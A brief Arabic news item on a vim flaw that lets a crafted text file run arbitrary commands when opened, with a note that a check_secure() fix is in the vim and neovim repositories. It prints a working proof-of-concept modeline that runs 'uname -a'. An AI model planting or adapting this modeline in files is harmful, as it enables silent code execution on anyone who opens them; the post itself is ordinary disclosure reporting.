ثغرة أمنية في vim

تم نشر ثغرة أمنية في محرر النصوص vim تسمح بتنفيذ تعليمات برمجية عشوائية عندما يفتح المحرر ملفًا نصيًا.

فيما يلي نص الملف الذي ينفذ uname -a غير الضار

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source! %"):fdl=0:fdt="

الإصلاح في شكل استدعاء check_secure() مضاف متوفر بالفعل في مستودعات vim وneovim.

المصدر: linux.org.ru

إضافة تعليق